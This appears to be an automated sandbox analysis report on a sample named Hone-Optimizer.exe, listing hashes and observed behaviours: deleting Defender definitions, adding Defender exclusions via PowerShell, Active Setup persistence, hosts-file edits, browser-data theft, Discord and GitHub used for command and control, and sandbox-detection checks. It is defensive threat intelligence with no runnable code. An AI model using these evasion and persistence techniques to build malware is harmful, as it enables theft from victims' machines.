Analysis
-
max time kernel
298s -
max time network
369s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
14-11-2024 11:53
Behavioral task
behavioral1
Sample
Hone-Optimizer.exe
Resource
win10ltsc2021-20241023-en
General
-
Target
Hone-Optimizer.exe
-
Size
7.7MB
-
MD5
baa9792a0bb9c8df5521b14e425dbe09
-
SHA1
1cf257b5c2ac3c84d468a3a6a3dbc846f7d50d5e
-
SHA256
07f228e81a538261d88699e099867204dc8fa6ba44590a75bd6c17bf50217b65
-
SHA512
45e7285cbbddb8ed61d4a39a09f15b032d8e39534139e96fe81f522fd9a644e2461080ff861062a35f3dec517a55bf584683b17dc2381c6f683f09ae06a4a636
-
SSDEEP
98304:8VeYgI6OshoKyDvuIYc5AhV+gEc4kZvRLoI0EJfNA3z5UTbdk+QqnWv9JTSPhlVX:8AYmOshoKMuIkhVastRL5Di3tKb0SPJX
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 4240 MpCmdRun.exe -
Modifies boot configuration data using bcdedit 1 TTPs 6 IoCs
pid Process 1132 bcdedit.exe 3040 bcdedit.exe 1096 bcdedit.exe 8 bcdedit.exe 4868 bcdedit.exe 2984 bcdedit.exe -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 6 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components Process not Found -
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1772 powershell.exe 5112 powershell.exe 2452 powershell.exe 4516 powershell.exe 4432 powershell.exe 2108 Process not Found 3688 powershell.exe 4304 powershell.exe 3156 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Hone-Optimizer.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 7 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions\IoPriority = "3" reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions\CpuPriorityClass = "4" reg.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation rundll32.exe -
Executes dropped EXE 3 IoCs
pid Process 3276 bound.exe 3156 rar.exe 2840 dismhost.exe -
Loads dropped DLL 35 IoCs
pid Process 3632 Hone-Optimizer.exe 3632 Hone-Optimizer.exe 3632 Hone-Optimizer.exe 3632 Hone-Optimizer.exe 3632 Hone-Optimizer.exe 3632 Hone-Optimizer.exe 3632 Hone-Optimizer.exe 3632 Hone-Optimizer.exe 3632 Hone-Optimizer.exe 3632 Hone-Optimizer.exe 3632 Hone-Optimizer.exe 3632 Hone-Optimizer.exe 3632 Hone-Optimizer.exe 3632 Hone-Optimizer.exe 3632 Hone-Optimizer.exe 3632 Hone-Optimizer.exe 2840 dismhost.exe 2840 dismhost.exe 2840 dismhost.exe 2840 dismhost.exe 2840 dismhost.exe 2840 dismhost.exe 2840 dismhost.exe 2840 dismhost.exe 2840 dismhost.exe 2840 dismhost.exe 2840 dismhost.exe 2840 dismhost.exe 2840 dismhost.exe 2840 dismhost.exe 2840 dismhost.exe 2840 dismhost.exe 2840 dismhost.exe 2840 dismhost.exe 2840 dismhost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 12 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: Process not Found File opened (read-only) \??\F: Process not Found File opened (read-only) \??\D: Process not Found File opened (read-only) \??\F: Process not Found File opened (read-only) \??\D: Process not Found File opened (read-only) \??\D: Process not Found File opened (read-only) \??\D: Process not Found File opened (read-only) \??\F: Process not Found File opened (read-only) \??\D: Process not Found File opened (read-only) \??\F: Process not Found File opened (read-only) \??\F: Process not Found File opened (read-only) \??\F: Process not Found -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 24 discord.com 25 discord.com 33 raw.githubusercontent.com 34 raw.githubusercontent.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 ip-api.com 22 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 28 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 4416 powercfg.exe 1644 powercfg.exe 4876 powercfg.exe 2364 powercfg.exe 116 powercfg.exe 4484 powercfg.exe 5116 powercfg.exe 1400 powercfg.exe 4592 powercfg.exe 408 powercfg.exe 1844 Process not Found 1116 powercfg.exe 1936 powercfg.exe 4540 powercfg.exe 4712 powercfg.exe 2096 powercfg.exe 224 powercfg.exe 3828 powercfg.exe 4000 Process not Found 4376 powercfg.exe 2388 powercfg.exe 2836 Process not Found 2288 Process not Found 4436 Process not Found 3688 powercfg.exe 4348 powercfg.exe 4220 powercfg.exe 2728 powercfg.exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 1212 tasklist.exe 216 tasklist.exe 2140 tasklist.exe 1084 tasklist.exe -
resource yara_rule behavioral1/files/0x0029000000045037-22.dat upx behavioral1/memory/3632-26-0x00007FFB443B0000-0x00007FFB44999000-memory.dmp upx behavioral1/files/0x0026000000045020-28.dat upx behavioral1/files/0x0026000000045035-32.dat upx behavioral1/memory/3632-33-0x00007FFB5D070000-0x00007FFB5D07F000-memory.dmp upx behavioral1/memory/3632-31-0x00007FFB53770000-0x00007FFB53793000-memory.dmp upx behavioral1/files/0x0022000000045027-39.dat upx behavioral1/memory/3632-41-0x00007FFB53570000-0x00007FFB5359D000-memory.dmp upx behavioral1/files/0x002200000004501e-42.dat upx behavioral1/memory/3632-45-0x00007FFB57C30000-0x00007FFB57C49000-memory.dmp upx behavioral1/files/0x0026000000045032-44.dat upx behavioral1/memory/3632-48-0x00007FFB52CE0000-0x00007FFB52D03000-memory.dmp upx behavioral1/files/0x002900000004503a-47.dat upx behavioral1/memory/3632-50-0x00007FFB43F70000-0x00007FFB440E7000-memory.dmp upx behavioral1/files/0x0022000000045029-51.dat upx behavioral1/memory/3632-53-0x00007FFB535B0000-0x00007FFB535C9000-memory.dmp upx behavioral1/files/0x0029000000045039-54.dat upx behavioral1/memory/3632-57-0x00007FFB57A20000-0x00007FFB57A2D000-memory.dmp upx behavioral1/files/0x0026000000045033-56.dat upx behavioral1/files/0x0026000000045034-59.dat upx behavioral1/memory/3632-61-0x00007FFB4A4E0000-0x00007FFB4A513000-memory.dmp upx behavioral1/files/0x0029000000045036-60.dat upx behavioral1/memory/3632-64-0x00007FFB443B0000-0x00007FFB44999000-memory.dmp upx behavioral1/memory/3632-67-0x00007FFB53770000-0x00007FFB53793000-memory.dmp upx behavioral1/memory/3632-66-0x00007FFB43760000-0x00007FFB4382D000-memory.dmp upx behavioral1/files/0x0022000000045023-68.dat upx behavioral1/memory/3632-70-0x00007FFB52BD0000-0x00007FFB52BE4000-memory.dmp upx behavioral1/memory/3632-74-0x00007FFB536D0000-0x00007FFB536DD000-memory.dmp upx behavioral1/files/0x002900000004503b-77.dat upx behavioral1/memory/3632-78-0x00007FFB43640000-0x00007FFB4375C000-memory.dmp upx behavioral1/files/0x0022000000045028-72.dat upx behavioral1/memory/3632-65-0x00007FFB43830000-0x00007FFB43D50000-memory.dmp upx behavioral1/memory/3632-109-0x00007FFB52CE0000-0x00007FFB52D03000-memory.dmp upx behavioral1/memory/3632-113-0x00007FFB43F70000-0x00007FFB440E7000-memory.dmp upx behavioral1/memory/3632-119-0x00007FFB535B0000-0x00007FFB535C9000-memory.dmp upx behavioral1/memory/3632-199-0x00007FFB4A4E0000-0x00007FFB4A513000-memory.dmp upx behavioral1/memory/3632-238-0x00007FFB43830000-0x00007FFB43D50000-memory.dmp upx behavioral1/memory/3632-239-0x00007FFB43760000-0x00007FFB4382D000-memory.dmp upx behavioral1/memory/3632-256-0x00007FFB443B0000-0x00007FFB44999000-memory.dmp upx behavioral1/memory/3632-262-0x00007FFB43F70000-0x00007FFB440E7000-memory.dmp upx behavioral1/memory/3632-257-0x00007FFB53770000-0x00007FFB53793000-memory.dmp upx behavioral1/memory/3632-312-0x00007FFB52CE0000-0x00007FFB52D03000-memory.dmp upx behavioral1/memory/3632-318-0x00007FFB43760000-0x00007FFB4382D000-memory.dmp upx behavioral1/memory/3632-317-0x00007FFB43830000-0x00007FFB43D50000-memory.dmp upx behavioral1/memory/3632-316-0x00007FFB4A4E0000-0x00007FFB4A513000-memory.dmp upx behavioral1/memory/3632-315-0x00007FFB57A20000-0x00007FFB57A2D000-memory.dmp upx behavioral1/memory/3632-314-0x00007FFB535B0000-0x00007FFB535C9000-memory.dmp upx behavioral1/memory/3632-313-0x00007FFB43F70000-0x00007FFB440E7000-memory.dmp upx behavioral1/memory/3632-311-0x00007FFB57C30000-0x00007FFB57C49000-memory.dmp upx behavioral1/memory/3632-310-0x00007FFB53570000-0x00007FFB5359D000-memory.dmp upx behavioral1/memory/3632-309-0x00007FFB5D070000-0x00007FFB5D07F000-memory.dmp upx behavioral1/memory/3632-308-0x00007FFB53770000-0x00007FFB53793000-memory.dmp upx behavioral1/memory/3632-307-0x00007FFB443B0000-0x00007FFB44999000-memory.dmp upx behavioral1/memory/3632-306-0x00007FFB43640000-0x00007FFB4375C000-memory.dmp upx behavioral1/memory/3632-305-0x00007FFB536D0000-0x00007FFB536DD000-memory.dmp upx behavioral1/memory/3632-304-0x00007FFB52BD0000-0x00007FFB52BE4000-memory.dmp upx -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\Logs\DISM\dism.log Dism.exe File opened for modification C:\Windows\Logs\DISM\dism.log dismhost.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe File opened for modification C:\Windows\CbsTemp TiWorker.exe -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 2108 Process not Found -
Launches sc.exe 34 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1960 Process not Found 3340 sc.exe 3180 sc.exe 788 sc.exe 2232 sc.exe 1540 sc.exe 4244 sc.exe 2328 Process not Found 3740 sc.exe 4568 sc.exe 4516 sc.exe 1816 sc.exe 4820 sc.exe 3652 sc.exe 2376 sc.exe 2580 sc.exe 3832 sc.exe 1844 sc.exe 3380 sc.exe 2636 sc.exe 1824 sc.exe 4808 sc.exe 4828 sc.exe 2624 Process not Found 4536 Process not Found 2304 Process not Found 896 sc.exe 4020 sc.exe 1164 sc.exe 4368 Process not Found 3012 Process not Found 544 sc.exe 4048 sc.exe 1248 Process not Found -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe -
System Time Discovery 1 TTPs 1 IoCs
Adversary may gather the system time and/or time zone settings from a local or remote system.
pid Process 1116 Process not Found -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A Process not Found Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A Process not Found -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4476 WMIC.exe 4692 WMIC.exe 1264 WMIC.exe -
Gathers network information 2 TTPs 4 IoCs
Uses commandline utility to view network configuration.
pid Process 4304 Process not Found 5112 Process not Found 1904 Process not Found 3756 Process not Found -
Kills process with taskkill 1 IoCs
pid Process 2984 Process not Found -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\GPU Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\GPU Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\GPU Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\GPU Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\GPU Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\GPU Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\GPU Process not Found Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\GPU Process not Found -
Modifies registry class 64 IoCs
